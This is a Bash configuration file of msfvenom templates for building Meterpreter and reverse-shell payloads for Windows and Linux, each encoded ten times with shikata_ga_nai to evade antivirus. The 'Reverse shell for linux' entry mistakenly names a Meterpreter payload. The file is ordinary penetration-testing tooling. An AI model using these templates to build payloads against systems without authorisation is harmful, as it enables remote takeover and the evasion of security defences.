# msfvenom.conf
# Here, all the templates reside.
# Make sure you declare yours as well as follow the example.
# You can also modify the configuration as well.

declare -A METERPRETER_WINDOWS
METERPRETER_WINDOWS=(
    ["name"]="Meterpreter for Windows"
    ["payload"]="windows/meterpreter_reverse_tcp"
    ["encoder"]="x86/shikata_ga_nai"
    ["iterations"]=10
    ["format"]="exe"
)

declare -A RSHELL_WINDOWS
RSHELL_WINDOWS=(
    ["name"]="Reverse shell for windows"
    ["payload"]="windows/shell_reverse_tcp"
    ["encoder"]="x86/shikata_ga_nai"
    ["iterations"]=10
    ["format"]="exe"
)

declare -A METERPRETER_LINUX
METERPRETER_LINUX=(
    ["name"]="Meterpreter for Linux"
    ["payload"]="linux/x86/meterpreter_reverse_tcp"
    ["encoder"]="x86/shikata_ga_nai"
    ["iterations"]=10
    ["format"]="elf"
)

declare -A RSHELL_LINUX
RSHELL_LINUX=(
    ["name"]="Reverse shell for linux"
    ["payload"]="linux/x86/meterpreter_reverse_tcp"
    ["encoder"]="x86/shikata_ga_nai"
    ["iterations"]=10
    ["format"]="elf"
)